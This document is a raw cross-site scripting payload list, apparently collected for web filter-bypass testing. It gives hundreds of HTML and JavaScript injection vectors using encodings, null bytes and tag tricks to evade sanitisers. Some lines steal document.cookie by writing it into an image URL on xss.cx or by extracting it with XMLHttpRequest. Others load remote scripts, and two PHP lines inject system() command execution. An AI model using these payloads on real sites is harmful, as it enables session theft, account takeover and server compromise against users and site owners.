<iframe src=`http://xssme.html5sec.org/?xss=<iframe onload=%22xhr=new XMLHttpRequest();xhr.open('GET','http://html5sec.org/xssme2',true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){confirm(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();%22>`>
<iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															28
																1
																	%29></iframe>
<iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe>
<iframe src=javascript:confirm(document.location)>
<iframe src="javascript:'<script src=http://xss.cx ></script>'"></iframe>
"><iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
<iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
<iframe width=0 height=0 src="javascript:confirm(1)">
<iframe/%00/ src=javaSCRIPT:confirm(1)
"><iframe%20src="http://google.com"%%203E
iframe.contentWindow.location.constructor.prototype
<iframe><iframe src=javascript:confirm(4)></iframe>
<iframe/name="if(0){\u0061lert(1)}else{\u0061lert(1)}"/onload="eval(name)";>
<iframe/name="if(0){\u0061lert(1)}else{\u0061lert(1)}"/onload="eval(name)";>
"><iframe/onreadystatechange=confirm(1)
<iframe/onreadystatechange=confirm(1)
<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
"><iframe/src \/\/onload = prompt(1)
<iframe/src \/\/onload = prompt(1)
<iframe/src="data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
<iframe/src="data:text/html,<svg onload=confirm(1)>">
/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>
<iframe/src=j	av	as	cri	pt	:co	nfir	m	(		1	)>
<iframe/src='javascript:if(null==null){javascript:0?1:confirm(1);}'>
<iframe/src='javascript:if(null==null){javascript:0?1:confirm(1);}'>
<!--[if]><script>confirm(1)</script -->
<img language=vbs src=<b onerror=confirm#1/1#>
"><img src="/" =_=" title="onerror='prompt(1)'">
<img src="/" =_=" title="onerror='prompt(1)'">
<img src ?itworksonchrome?\/onerror = confirm(1)
<img src ?itworksonchrome?\/onerror = confirm(1)???
“><img src= onerror=confirm(1)>
<img src=//\ onload=confirm(1)>
<img src=`%00`
 onerror=confirm(1)

<img src=1 onerror=Function("aler"+"t(documen"+"t.domain)")()>
"]<img src=1 onerror=confirm(1)>
/#<img src=1 onerror=javascript:confirm(3)>
<img src=a onerror=eval(String.fromCharCode(97,108,101,114,116,40,39,67,104,101,97,116,115,111,110,39,41))>
<img src=http://www.google.fr/images/srpr/logo3w.png onload=confirm(this.ownerDocument.cookie) width=0 height= 0 /> #
"><img src=javascript:while([{}]);>
<img src=javascript:while([{}]);>
<img/ src//'onerror/''/=confirm(1)//'>
<img src=test.jpg?value=">Yes, we are still inside a tag!">
<img src=x on*chr*Error="javascript:log(*num*)"/>
<img src=x on*chr*Error="javascript:log(*num*)"/>
<img src=x onerror=URL='javascript:confirm(1)'>
"\"><img src=\"x\" onerror=\"confirm(0)\"/>",
><img src=\"x\" onerror=\"confirm(0)\"/>
<img src=x onerror='confirm(domain+/ -- /+cookie)'>">
<img src=x onerror='confirm(domain+/ -- /+cookie)'>">
"><img src=x onerror=confirm('x') />]
"><img src=x onerror=confirm(1); ...
"><img src=x onerror=prompt(1);>
"><img src=x onerror=prompt(document.location);>#"><img src=x onerror=prompt(document.location);>
"><img src=x onerror=prompt("xss");>#"><img src=x onerror=prompt("xss");>
"><img src=x onerror=window.open('https://www.google.com/');>
"<img src=x onerror=x.onerror=confirm(1);prompt(2);confirm(/XSS/.source);prompt(String.fromCharCode(88,83,83))>"
"\"><img src=x onerror=x.onerror=confirm(1);prompt(2);confirm(/XSS/.source);prompt(String.fromCharCode(88,83,83))>",
<img src=x onerror=x.onerror=confirm(1);prompt(2);confirm(/XSS/.source);prompt(String.fromCharCode(88,83,83))>
><img src=x onerror=x.onerror=confirm(1);prompt(2);confirm(/XSS/.source);prompt(String.fromCharCode(88,83,83))>
"<img src=x onerror=x.onerror=m='%22%3E%3Cimg%20src%3Dx%20onerror%3Dx.onerror%3Dprompt%28/xss/.source%29%3E';d=unescape(m);document.write(d);prompt(String.fromCharCode(88,83,83))>"
<img src=x onerror=x.onerror=m='%22%3E%3Cimg%20src%3Dx%20onerror%3Dx.onerror%3Dprompt%28/xss/.source%29%3E';d=unescape(m);document.write(d);prompt(String.fromCharCode(88,83,83))>
"/><img src=x onerror=x.onerror=prompt(0)>
"\"/><img src=x onerror=x.onerror=prompt(0)>"
"/><img src=x onerror=x.onerror=prompt(/xss/.source);confirm(0);confirm(1)>
"\"/><img src=x onerror=x.onerror=prompt(/xss/.source);confirm(0);confirm(1)>"
<![<img src=x:x onerror=`confirm(2)//`]-->
<img src=xx: onerror=confirm(document.location)>
"><img src="xx:x" alt="``onerror=confirm(1)"><script>document.body.innerHTML+=''</script>
<img src="xx:x" alt="``onerror=confirm(1)"><script>document.body.innerHTML+=''</script>
"<img src=`xx:xx` onerror=confirm(/XSS/.source);confirm(1)>"
"\"><img src=`xx:xx` onerror=confirm(/XSS/.source);confirm(1)>",
<img src=`xx:xx` onerror=confirm(/XSS/.source);confirm(1)>
><img src=`xx:xx` onerror=confirm(/XSS/.source);confirm(1)>
<img src=xx:xx onerror=window[['logChr*chr*']](*num*)>
<img src=`xx:xx`onerror=confirm(1)>
<img src=`xx:xx`onerror=confirm(1)>
<img/	  src=`~` onerror=prompt(1)>
>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;confirm(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)>
"<img/src=` onerror=confirm(1)>"
<img/src=` onerror=confirm(1)>
"><--`<img/src=` onerror=confirm(1)> --!>
<--`<img/src=` onerror=confirm(1)> --!>
<img/src=%00 id=confirm(1) onerror=eval(id)
<img/src=`%00` /id=confirm(1) /onerror=eval(id)
<img/src=`%00` onerror=this.onerror=confirm(1)
<img/src=@  onerror = prompt('1')
<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=	prompt(1)
<img/src=x alt=confirm(1) onmouseover=eval(alt)>
<img/src=x alt=confirm(1) onmouseover=eval(alt)>
"\"><imgsrc=x onerror=confirm.onerror=confirm(1)>",
><imgsrc=x onerror=confirm.onerror=confirm(1)>
<img/src="x"/id="javascript"/name=":confirm"/alt="(1)"/onerror="eval(id + name + alt)">
=’”><img/src=”x”onerror=eval(String.fromCharCode(119,105,110,100,111,119,46,108,111,99,97,108,83,116,111,114,97,103,101,46,115,101,116,73,116,101,109,40,39,105,100,39,44,39,34,62,60,105,109,103,47,115,114,99,61,92,34,120,92,34,111,110,101,114,114,111,114,61,97,108,101,114,116,40,49,41,62,39,41))>
'><img/src="x:x"/onerror="confirm(1)"'><
innerHTML=document.title
innerHTML=innerText
<input autofocus onfocus=confirm(1)>
<input formaction=JaVaScript:confirm(document.cookie)>
<input id=x><input id=x><script>confirm(x)</script>
<><input onfocus=confirm(0) autofocus <!--
<input pattern=^((a+.)a)+$ value=aaaaaaaaaaaaaaa!>
<input type=hidden onformchange=confirm(1)/>
<input type=hidden style=`x:expression(confirm(1))`>
<input type=hidden style=`x:expression(confirm(4))`>
<input type="text" name="a"
<input type="text" value=`` <div/onmouseover='confirm(1)'>X</div>
<input type="text" value=``<div/onmouseover='confirm(1)'>X</div>
"><input value=<><iframe/src=javascript:confirm(1)
<input value=<><iframe/src=javascript:confirm(1)
input1=<script/&in%u2119ut1=>al%u0117rt('1')</script>
<input/onmouseover="javaSCRIPT:confirm(1)"
<i/onclick=URL=name>
"/><isindex action="javas	cript:confirm(1)" type=image>
"><isindex action="javas	cript:confirm(1)" type=image>
<isindex action="javas	cript:confirm(1)" type=image>
<isindex action="javas	cript:confirm(document.cookie)" type=image>
<isindex formaction=javascript:confirm(1)>
<label class="<% confirm(1) %>">
<li style="color:rgb(''0,0,�javascript:expression(confirm(1))">XSS</li>
<link rel="import" href="//xss.cx">
<link rel=import onerror=confirm(1)>
<link rel="prefetch" href="http://xss.cx">
<link rel=stylesheet href='data:,+/v8*%7bx:e+AHgAcA-ression(confirm(1))%7D' >
<link%20rel="import"%20href="?bypass=<script>confirm(document.domain)</script>">
<listing><img src=x onerror=confirm(1)></listing>
<
<
<a href="http://i.imgur.com/b7sajuK.jpg" download><a href="http://i.imgur.com/b7sajuK.jpg" download>What a cute kitty!</a></a>
<img src=xx:x onerror=confirm(1)><script>document.body.innerHTML=document.body.innerText||document.body.textContent</script>
<label class="<% confirm(1) %>">
</script><script>confirm(1)</script>
<marquee onstart='javascript:confirm(1)'>^__^
"><marquee>confirm( `bypass :)`)</marquee>
"<marquee/onstart=confirm(/XSS/.source);confirm(1)>"
"\"><marquee/onstart=confirm(/XSS/.source);confirm(1)>",
<marquee/onstart=confirm(/XSS/.source);confirm(1)>
><marquee/onstart=confirm(/XSS/.source);confirm(1)>
<math><a xlink:href="//jsfiddle.net/t846h/">click
<math><a/xlink:href=javascript:confirm(1)>click
<math><a/xlink:href=javascript:eval('\141\154\145\162\164\50\61\51')>X
<meta charset="x-mac-farsi">¼script ¾confirm(1)//¼/script ¾
<meta content="
 1 
; JAVASCRIPT: confirm(1)" http-equiv="refresh"/>
<meta http-equiv=refresh content="0 javascript:confirm(1)">
"><meta http-equiv="refresh" content="0;javascript:confirm(1)"/>
<meta http-equiv="refresh" content="0;javascript:confirm(1)"/>
<meta http-equiv="refresh" content="0;javascript:confirm(1)"/>?
<meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
<meta http-equiv=refresh content=+.1,javascript:confirm(document.cookie)>
?movieName=";]);}catch(e){}if(!self.a)self.a=!confirm(document.domain);//
<object data=%22data:text/html;base64,PHNjcmlwdD4gdmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpOyB4aHIub3BlbignR0VUJywgJ2h0dHA6Ly94c3NtZS5odG1sNXNlYy5vcmcveHNzbWUyJywgdHJ1ZSk7IHhoci5vbmxvYWQgPSBmdW5jdGlvbigpIHsgYWxlcnQoeGhyLnJlc3BvbnNlVGV4dC5tYXRjaCgvY29va2llID0gJyguKj8pJy8pWzFdKSB9OyB4aHIuc2VuZCgpOyA8L3NjcmlwdD4=%22>
<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>
<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>?
"\"\/><object data='data:text/html;base64,PHNjcmlwdD5hbGVydCgieHNzIik8L3NjcmlwdD4='></object>"
><object data='data:text/html;base64,PHNjcmlwdD5hbGVydCgieHNzIik8L3NjcmlwdD4='></object>"
<object data='data:text/xml,<script xmlns="http://www.w3.org/1999/xhtml ">confirm(1)</script>>'>
"><object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">?
"/><object data=javascript:\u0061le%72t(1)>
<object data=javascript:\u0061le%72t(1)>
"/><object type='text/x-html' data='javascript:prompt(/xss/.source);var x = prompt;x(0);x(/XSS/.source);x'></object>
"<object type='text/x-html' data='javascript:prompt(/xss/.source);var x = prompt;x(0);x(/XSS/.source);x'></object>"
"><object type='text/x-html' data='javascript:prompt(/xss/.source);var x = prompt;x(0);x(/XSS/.source);x'></object>",
<object type='text/x-html' data='javascript:prompt(/xss/.source);var x = prompt;x(0);x(/XSS/.source);x'></object>
"/><object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>
<object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>
/*-->]]>%>?></object></script></title></textarea></noscript></style></xmp>'-/"///><img id="b1" src=1 onerror='$.getScript("http://xss.cx.js", function() { c(); });'>'
"<option>'><button><img src=x onerror=confirm(0);></button></option>"
<option>'><button><img src=x onerror=confirm(0);></button></option>
"\"\/><option>'><button><img src=x onerror=confirm(1);></button></option>",
><option>'><button><img src=x onerror=confirm(1);></button></option>
<p hidden?={{hidden}}>123</p>
<p style="font-family:'foo&#x5c;27&#x5c;3bx:expr&#x65;ession(confirm(1))'">
?param1=<script>prompt(9);/*¶m2=*/</script>
$.parseHTML('<img src=xx:X onerror=confirm(1)>')
<?php echo $_SERVER['PHP_SELF']?>
</plaintext\></|\><plaintext/onmouseover=prompt(1)
?playerID=a\";))}catch(e){confirm(document.domain)}//
${@print(system($_SERVER['HTTP_USER_AGENT']))}
${@print(system(“whoami”))}
<q/oncut=confirm()
'/><q/oncut=open()>//
<q/oncut=open()>
>"><script>confirm('hi')</script>"<</a>value=""><script>confirm('hi')</script>"<"/>
.replace(/.+/,eval)//
<s "'"="" 000="">
"'"><s/000 "'"><s/000
"'"><s/000 "'"><s/000
<s%00c%00r%00%00ip%00t>confirm(0);</s%00c%00r%00%00ip%00t>
<s[NULL]cript>confirm(1)</s[NULL]cript>'>Clickme</a>
<sVg><scRipt %00>confirm(1)
<<scr\0ipt/src=http://xss.cx/xss.js></script
<scri%00ipt>confirm(0);</script>
<scri%00pt>confirm(1);</scri%00pt>
"<scri%00pt>confirm(0);</scri%00pt>"
"\"><scri%00pt>confirm(0);</scri%00pt>",
<scri%00pt>confirm(0);</scri%00pt>
><scri%00pt>confirm(0);</scri%00pt>
<script>/* */confirm(1)/* */</script>
<script> function b() { return Safe.get(); } confirm(b({type:String.fromCharCode(99,108,105,99,107),isTrusted:true})); </script>
<script> function foo(elem, doc, text) { elem.onclick = function (e) { e.__defineGetter__(text[0], function () { return true }) confirm(Safe.get()); }; var event = doc.createEvent(text[1]); event.initEvent(text[2], true, true); elem.dispatchEvent(event); } </script> <img src=http://www.google.fr/images/srpr/logo3w.png onload=foo(this,this.ownerDocument,this.name.split(/,/)) name=isTrusted,MouseEvent,click width=0 height=0 /> #
<script> (function (o) { function exploit(x) { if (x !== null) confirm('User cookie is ' %2B x); else console.log('fail'); } o.onclick = function (e) { e.__defineGetter__('isTrusted', function () { return true; }); exploit(Safe.get()); }; var e = document.createEvent('MouseEvent'); e.initEvent('click', true, true); o.dispatchEvent(e); })(document.getElementById('safe123')); </script>
<script /*%00*/>/*%00*/confirm(1)/*%00*/</script /*%00*/
<script ~~~>confirm(0%0)</script ~~~>
<script ^__^>confirm(String.fromCharCode(49))</script ^__^
'"`><script>/* **chr*log(*num*)// */</script>
<script>/* **chr*/log(*num*)// */</script>
<script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/
<script> document.getElementById(%22safe123%22).click=function()+{confirm(Safe.get());} document.getElementById(%22safe123%22).click({'type':'click','isTrusted':true}); </script>
<script> document.getElementById(%22safe123%22).setCapture(); document.getElementById(%22safe123%22).click(); </script>
<script for=_ event=onerror()>confirm(/@ma1/)</script><img id=_ src=>
<script for=document event=onreadystatechange>getElementById('safe123').click()</script>
<script itworksinallbrowsers>/*<script* */confirm(1)</script
<script itworksinallbrowsers>/*<script* */confirm(1)</script ?
<script> location.href = 'data:text/html;base64,PHNjcmlwdD54PW5ldyBYTUxIdHRwUmVxdWVzdCgpO3gub3BlbigiR0VUIiwiaHR0cDovL3hzc21lLmh0bWw1c2VjLm9yZy94c3NtZTIvIix0cnVlKTt4Lm9ubG9hZD1mdW5jdGlvbigpIHsgYWxlcnQoeC5yZXNwb25zZVRleHQubWF0Y2goL2RvY3VtZW50LmNvb2tpZSA9ICcoLio/KScvKVsxXSl9O3guc2VuZChudWxsKTs8L3NjcmlwdD4='; </script>
<script> logChr0x09(1); </script>
<script src=>confirm(8)</script>
"/><script src="data:text/javascript,confirm(1)"></script>
<script src="data:text/javascript,confirm(1)"></script>
"<script src='data:text/javascript,prompt(/XSS/.source);var x = prompt;x(0);x(/XSS/.source);x'></script>"
"\"><script src='data:text/javascript,prompt(/XSS/.source);var x = prompt;x(0);x(/XSS/.source);x'></script>",
<script src='data:text/javascript,prompt(/XSS/.source);var x = prompt;x(0);x(/XSS/.source);x'></script>
><script src='data:text/javascript,prompt(/XSS/.source);var x = prompt;x(0);x(/XSS/.source);x'></script>
<script type="text/xaml"><Canvas Loaded="confirm" /></script>
<script> "\ud83d\u*hex4*".match(/.*<.*/) ? log(*num*) : null; </script>
<script> var xdr = new ActiveXObject(%22Microsoft.XMLHTTP%22); xdr.open(%22get%22, %22/xssme2%3Fa=1%22, true); xdr.onreadystatechange = function() { try{ var c; if (c=xdr.responseText.match(/document.cookie = '(.*%3F)'/) ) confirm(c[1]); }catch(e){} }; xdr.send(); </script>
<script> var+MouseEvent=function+MouseEvent(){}; MouseEvent=MouseEvent var+test=new+MouseEvent(); test.isTrusted=true; test.type='click'; document.getElementById(%22safe123%22).click=function()+{confirm(Safe.get());} document.getElementById(%22safe123%22).click(test); </script>
"/><script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi); confirm(RegExp.%241); } } xmlHttp.send(null); }; </script>#
<script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi); confirm(RegExp.%241); } } xmlHttp.send(null); }; </script>
<script> var+x+=+showModelessDialog+(this); confirm(x.document.cookie); </script>
"/><script x> confirm(1) </script 1=2
<script x> confirm(1) </script 1=2
<script/%00%00v%00%00>confirm(/@jackmasa/)</script> and %c0″//(%000000%0dconfirm(1)//
<script>({0:#0=confirm/#0#/#0#(0)})</script>
<script>(0)['constructor']['constructor']("\141\154\145\162\164(1)")();</script>
"<script>1-confirm(0);</script>"/>
"/><script>+-+-1-+-+confirm(1)</script>
<script>+-+-1-+-+confirm(1)</script>
<script>Object.defineProperties(window, {Safe: {value: {get: function() {return document.cookie}}}});confirm(Safe.get())</script>
<script>Object.defineProperty(window, 'Safe', {value:{}});Object.defineProperty(Safe, 'get', {value:function() {return document.cookie}});confirm(Safe.get())</script>
<script/	 src='https://dl.dropbox.com/u/13018058/js.js' /	></script>
<script>a='abc\*chr*\';log(*num*)//def';</script>
"<script>'confirm(0)%3B<%2Fscript>"
"\"><script>'confirm(0)%3B<%2Fscript>",
<script>'confirm(0)%3B<%2Fscript>
><script>'confirm(0)%3B<%2Fscript>
"<script>confirm(0);</script>"
"><"script">"confirm(0)"</"script">
"\"><script>confirm(0)</script>",
<script>confirm(0);</script>
><script>confirm(0)</script>
"'><script>confirm(1)</script>",
<sc'+'ript>confirm(1)</script>
<script>confirm(1)</script>
>"<>"<script>confirm(1)</script>
[<script>]=*confirm(1)</script>
∀㸀㰀script㸀confirm(1)㰀/script㸀
<%<!--'%><script>confirm(1);</script -->
<%<!--'%><script>confirm(1);</script -->
"/><script>confirm(1);</script><img src=x onerror=x.onerror=prompt(0)>
"\"/><script>confirm(1);</script><img src=x onerror=x.onerror=prompt(0)>"
>"<>"<script>confirm(2)</script>
<script>confirm(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(this,'window')(),'document')(), 'getElementsByTagName')('html')[0],'innerHTML')().match(/d.*'/));</script>
"<script>confirm(String.fromCharCode(88,83,83));</script>"
"\"><script>confirm(String.fromCharCode(88,83,83));</script>",
<script>confirm(String.fromCharCode(88,83,83));</script>
><script>confirm(String.fromCharCode(88,83,83));</script>
<script>/*confirm("Woops");*/</script>
<script>confirm(document.documentElement.innerHTML.match(/'([^']%2b)/)[1])</script>
<script>confirm(document.getElementsByTagName('html')[0].innerHTML.match(/'([^']%2b)/)[1])</script>
<script>confirm(document.head.childNodes[3].text)</script>
<script>confirm(document.head.innerHTML.substr(146,20));</script>
>"><script>confirm(document.location)</script>&
<script>confirm(""no")</script>
<script>confirm(x.y[0])</script>
<script>confirm(x.y.x.y.x.y[0]);confirm(x.x.x.x.x.x.x.x.x.y.x.y.x.y[0]);</script>
"'`><script>a=/xss;*chr*;i=0;log(*num*);a/i;</script>
"`'><script>*chr*log(*num*)</script>
<script>document.body.innerHTML="<h1>XSS-Here</h1>"</script>
<script>document.write(Array(184).join('<marquee>'))</script>
"/><script>document.write("<img src=//xss.cx/" + document.cookie + ">")</script>
<script>document.write("<img src=//xss.cx/" + document.cookie + ">")</script>
<script>(function() {var event = document.createEvent(%22MouseEvents%22);event.initMouseEvent(%22click%22, true, true, window, 0, 0, 0, 0, 0, false, false, false, false, 0, null);var fakeData = [event, {isTrusted: true}, event];arguments.__defineGetter__('0', function() { return fakeData.pop(); });confirm(Safe.get.apply(null, arguments));})();</script>
<script>function x(window) { eval(location.hash.substr(1)) }; open(%22javascript:opener.x(window)%22)</script>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { confirm(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();
<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe id=iframe src=%22javascript:parent.x(window)%22><iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { confirm(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();
<script>if("x\*chr*".length==1) { log(*num*);}</script>
</script><img/*%00/src="worksinchrome:prompt(1)"/%00*/onerror='eval(src)'>
"`'><script>lo*chr*g(*num*)</script>
"`'><script>lo*chr*g(*num*)</script>
"'`><script>log*chr*(*num*)</script>
<script/onload=confirm(1)></script>
\"><script>prompt(1)</script>
</script><script>confirm(3)</script>
</script><script>/*var a="/*""'/**/;confirm(1);//</script>
<script>({set/**/$($){_/**/setter=$,_=1}}).$=confirm</script>
<script/src=data:text/javascript,alert(1)></script>
<script/src=data:text/javascript,alert(1)></script> ?
"/><script+src=data:,confirm(1)<!--
<script+src=data:,confirm(1)<!--
"/><script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F
<script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F
<script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script
<script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script ????????????
<script/src=//xss.cx>/*
<script>str='';for(i=0;i<0xefff;i++){str+='<script>AAAAAA';};document.write('<svg>'+str+'</svg>');</script>
</script><svg '//"
</script><svg onload='-/"/-confirm(1)//'
</script><svg onload='-/"/-confirm(1)//'"
<script>try{eval("<></>");logBoolean(1)}catch(e){logBoolean(0)};</script>
<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
<script/v>confirm(/@jackmasa/)</script>
<script>-{valueOf:location,toString:[].pop,0:'vbscript:confirm%281%29',length:1}</script>
<script>var location={};</script>
<script>var request = new XMLHttpRequest();request.open('GET', 'http://html5sec.org/xssme2', false);request.send(null);if (request.status == 200){confirm(request.responseText.substr(150,41));}</script>
<script>var script = document.getElementsByTagName('script')[0]; var clone = script.childNodes[0].cloneNode(true); var ta = document.createElement('textarea'); ta.appendChild(clone); confirm(ta.value.match(/cookie = '(.*?)'/)[1])</script>
<script>var x = document.createElement('iframe');document.body.appendChild(x);var xhr = x.contentWindow.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { confirm(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();</script>
<script>var x = safe123.onclick;safe123.onclick = function(event) {var f = false;var o = { isTrusted: true };var a = [event, o, event];var get;event.__defineGetter__('type', function() {get = arguments.callee.caller.arguments.callee;return 'click';});var _confirm = confirm;confirm = function() { confirm = _confirm };x.apply(null, a);(function() {arguments.__defineGetter__('0', function() { return a.pop(); });confirm(get());})();};safe123.click();</script>#
`'"><script>window['log*chr*'](*num*)</script>
'<script>window.onload=function(){document.forms[0].message.value='1';}</script>
<script>x="confirm(1)".replace(/.+/,eval)//"</script>
<script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>Object.defineProperty(parent,'Safe',{value:{}});Object.defineProperty(parent.Safe,'get',{value:function(){return top.document.cookie}});confirm(parent.Safe.get())<\/script>%22)};document.body.appendChild(x);</script>
<script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){confirm(r.responseText.substr(150,41));}<\/script>%22)};document.body.appendChild(x);</script>
<script>xhr=new ActiveXObject(%22Msxml2.XMLHTTP%22);xhr.open(%22GET%22,%22/xssme2%22,true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){confirm(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();</script>
<script>x=""!=prompt(9)!="";y=42;</script>
<script>x=""%prompt(9)%"";y=42;</script>
<script>x=""&&prompt(9)&&"";y=42;</script>
<script>x=""&prompt(9)&"";y=42;</script>
<script>x=""*prompt(9)*"";y=42;</script>
<script>x=""+prompt(9)+"";y=42;</script>
<script>x=""-prompt(9)-"";y=42;</script>
<script>x=""/prompt(9)/"";y=42;</script>
<script>x=""<<prompt(9)<<"";y=42;</script>
<script>x=""<=prompt(9)<="";y=42;</script>
<script>x=""<prompt(9)<"";y=42;</script>
<script>x=""===prompt(9)==="";y=42;</script>
<script>x=""==prompt(9)=="";y=42;</script>
<script>x="">=prompt(9)>="";y=42;</script>
<script>x="">>>prompt(9)>>>"";y=42;</script>
<script>x="">>prompt(9)>>"";y=42;</script>
<script>x="">prompt(9)>"";y=42;</script>
<script>x=""?prompt(9):"";y=42;</script>
<script>x=""^prompt(9)^"";y=42;</script>
<script>x=""|prompt(9)|"";y=42;</script>
<script>x=""||prompt(9)||"";y=42;</script>
"><scri<script></script>pt>confirm(document.cookie);</scri<script></script>pt>
<scri\x00pt>confirm(1);</scri%00pt>
setTimeout(['confirm(4)']);
<span id="x" data-constructor=oops></span><script>confirm(x.dataset.constructor)</script>
stop, open, print && confirm(1)
</style  ><script   :-(>/**/confirm(document.location)/**/</script   :-(
<style>body{font-size: 0;} h1{font-size: 12px !important;}</style><h1><?php echo "<hr />THIS IMAGE COULD ERASE YOUR WWW ACCOUNT, it shows you the PHP info instead...<hr />"; phpinfo(); __halt_compiler(); ?></h1>
<style>*{font-family:'Serif}';x[value=expression(confirm(URL=1));]{color:red}</style>
<style>*{-o-link:'data:text/html,<svg/onload=confirm(5)>';-o-link-source:current}</style><a href=1>aaa
<style/onload = !-confirm(1)>
<style/onload=confirm(1)>
<style/onload="javascript:if('[object Object]'=={}&&1==[1])confirm(1);">
<style/onload=<!--	> confirm (1)>
<style/onload=prompt('XSS')
<style>p[foo=bar{}*{-o-link:'javascript:confirm(1)'}{}*{-o-link-source:current}*{background:red}]{background:green};</style>
<///style///><span %2F onmousemove='confirm(1)'>SPAN
<style>//<!--</style> -->*{x:expression(confirm(4))}//<style></style>
<svg contentScriptType=text/vbs><script>MsgBox+1
<svg contentScriptType=text/vbs><script>XSS
<svg id=1 onload=confirm(1)>
<svg onload=confirm(1)
"><svg onload="confirm(7)">
<svg onload="confirm(7)">
<svg onload=eval(URL)>
<svg onload=eval(document.cookie)>
<svg onload=eval(window.name)>
<svg xml:base="data:text/html,<script>confirm(1)</script>"><a xlink:href="#"><circle r="40"></circle></a></svg>
<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:confirm(1)"></g></svg>
<svg xmlns:xlink="http://www.w3.org/1999/xlink"><a><circle r=100 /><animate attributeName="xlink:href" values=";javascript:confirm(1)" begin="0s" dur="0.1s" fill="freeze"/>
<svg></ y="><x" onload=confirm(4)>
<svg><doh onload=confirm(1)>
<svg><image x:href="data:image/svg-xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='confirm(1)'%3E%3C/svg%3E">
"<svg/onload=confirm(0);prompt(0);>"
<svg/onload=confirm(0);prompt(0);>
<svg/onload=confirm(1)
"/><svg/onload=confirm(/XSS/.source);prompt(String.fromCharCode(88,83,83));prompt(0)>
"\"/><svg/onload=confirm(/XSS/.source);prompt(String.fromCharCode(88,83,83));prompt(0)>"
<svg/onload='javascript0x00:void(0)%00?void(0):confirm(1)'>
"<svg/onload=prompt(0);>"
<svg/onload=prompt(0);>
"<svg/onload=prompt(/XSS/.source);prompt(0);confirm(0);confirm(0);>"
"\"><svg/onload=prompt(/XSS/.source);prompt(0);confirm(0);confirm(0);>",
<svg/onload=prompt(/XSS/.source);prompt(0);confirm(0);confirm(0);>
><svg/onload=prompt(/XSS/.source);prompt(0);confirm(0);confirm(0);>
<svg/onload=window.onerror=confirm;throw/5/;//
<svg/onload=window.onerror=confirm;throw/XSS/;//
<svg/onload=window.onerror=confirm;throw/XSS/;//"
<svg><script ?>confirm(1)
